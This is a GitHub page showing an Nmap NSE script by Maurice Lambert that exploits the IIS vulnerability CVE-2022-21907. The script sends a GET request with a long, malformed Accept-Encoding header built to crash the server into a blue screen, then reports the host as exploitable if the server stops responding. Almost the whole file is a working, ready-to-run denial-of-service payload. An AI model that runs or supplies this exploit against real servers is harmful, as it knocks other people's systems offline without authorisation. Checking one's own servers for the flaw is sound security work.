-
Notifications
You must be signed in to change notification settings - Fork 11
/
dos_iis_2022_21907.nse
88 lines (80 loc) · 2.76 KB
/
dos_iis_2022_21907.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
description = [[
The IIS Web Server contains a RCE vulnerability. This script
exploits this vulnerability with a DOS attack (causes a Blue Screen).
]]
author = "Maurice LAMBERT <[email protected]>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"dos", "exploit", "intrusive", "vuln"}
---
-- @name
-- IIS DOS CVE-2022-21907 - Web Server Blue Screen
-- @author
-- Maurice LAMBERT <[email protected]>
-- @usage
-- nmap -p 80 --script dos_iis_2022_21907 <target>
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | dos_iis_2022_21907:
-- | VULNERABLE:
-- | IIS CVE-2022-21907 DOS
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2022-21907
-- | The IIS Web Server contains a RCE vulnerability. This script
-- | exploits this vulnerability with a DOS attack
-- | (causes a Blue Screen).
-- |
-- | Disclosure date: 2022-01-11
-- | References:
-- | https://nvd.nist.gov/vuln/detail/CVE-2022-21907
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
-- |_ https://github.com/mauricelambert/CVE-2022-21907
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
local http = require "http"
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "IIS CVE-2022-21907 DOS",
state = vulns.STATE.NOT_VULN,
IDS = { CVE = 'CVE-2022-21907' },
description = [[
The IIS Web Server contains a RCE vulnerability. This script
exploits this vulnerability with a DOS attack
(causes a Blue Screen).
]],
references = {
'https://nvd.nist.gov/vuln/detail/CVE-2022-21907',
'https://github.com/mauricelambert/CVE-2022-21907',
},
dates = {
disclosure = {year = '2022', month = '01', day = '11'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local headers = {}
headers["Accept-Encoding"] = "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAA" ..
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA" ..
"**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ..
"AAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ..
"AAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************A" ..
"AAAAA, *, ,"
stdnse.debug2("Web service is up. Send payload...")
local response = http.generic_request(
host,
port,
"GET",
"/",
{
timeout = 10,
header = headers,
}
)
if (response.status) then
return report:make_output(vuln)
else
vuln.state = vulns.STATE.EXPLOIT -- UNKNOWN, LIKELY_VULN
return report:make_output(vuln)
end
end